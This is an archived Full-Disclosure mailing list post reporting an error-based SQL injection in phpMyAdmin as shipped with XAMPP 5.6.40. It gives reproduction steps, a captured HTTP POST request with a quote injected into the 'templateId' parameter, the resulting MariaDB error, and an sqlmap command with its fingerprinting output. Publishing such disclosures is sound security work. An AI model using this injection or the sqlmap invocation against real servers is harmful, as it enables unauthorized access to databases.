lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CAF2Wu1adkbt64RJ6SuK2r-hJuPLjA8sF2=7yewQuD1-0B6M_LA@mail.gmail.com>
Date: Wed, 28 Feb 2024 00:59:41 +0000
From: Andrey Stoykov <mwebsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] XAMPP 5.6.40 - Error Based SQL Injection

# Exploit Title: XAMPP - Error Based SQL Injection
# Date: 02/2024
# Exploit Author: Andrey Stoykov
# Version: 5.6.40
# Tested on: Ubuntu 22.04
# Blog: http://msecureltd.blogspot.com

Steps to Reproduce:

1. Login to phpmyadmin
2. Visit Export > New Template > test > Create
3. Navigate to "Existing Templates"
4. Select template "test" and click "Update"
5. Trap HTTP POST request
6. Place single quote to "templateId" parameter


// HTTP POST request

POST /phpmyadmin/tbl_export.php HTTP/1.1
Host: 192.168.159.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
[...]

ajax_request=true&server=1&db=&table=&exportType=server&templateAction=load&templateId=1'&_nocache=170904357625092438&token=%5D%7BwM4%22xq%26%3C%7Fioycy


// HTTP response

HTTP/1.1 200 OK
Date: Tue, 27 Feb 2024 16:44:09 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev
Perl/v5.16.3
X-Powered-By: PHP/5.6.40
[...]

{"success":false,"error":"#1064 - You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the
right syntax to use near '\\' AND `username` = 'root'' at line 1"}

sqlmap -r request.txt --dbms=mysql --threads 10 --level 5 --risk 3
--fingerprint

[...]
[16:55:00] [INFO] confirming MySQL
[16:55:01] [INFO] the back-end DBMS is MySQL
[16:55:01] [INFO] actively fingerprinting MySQL
[16:55:02] [INFO] executing MySQL comment injection fingerprint
web application technology: PHP 5.6.40, Apache 2.4.37
back-end DBMS: active fingerprint: MySQL >= 5.5
               comment injection fingerprint: MySQL 5.6.52
               fork fingerprint: MariaDB
[...]
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists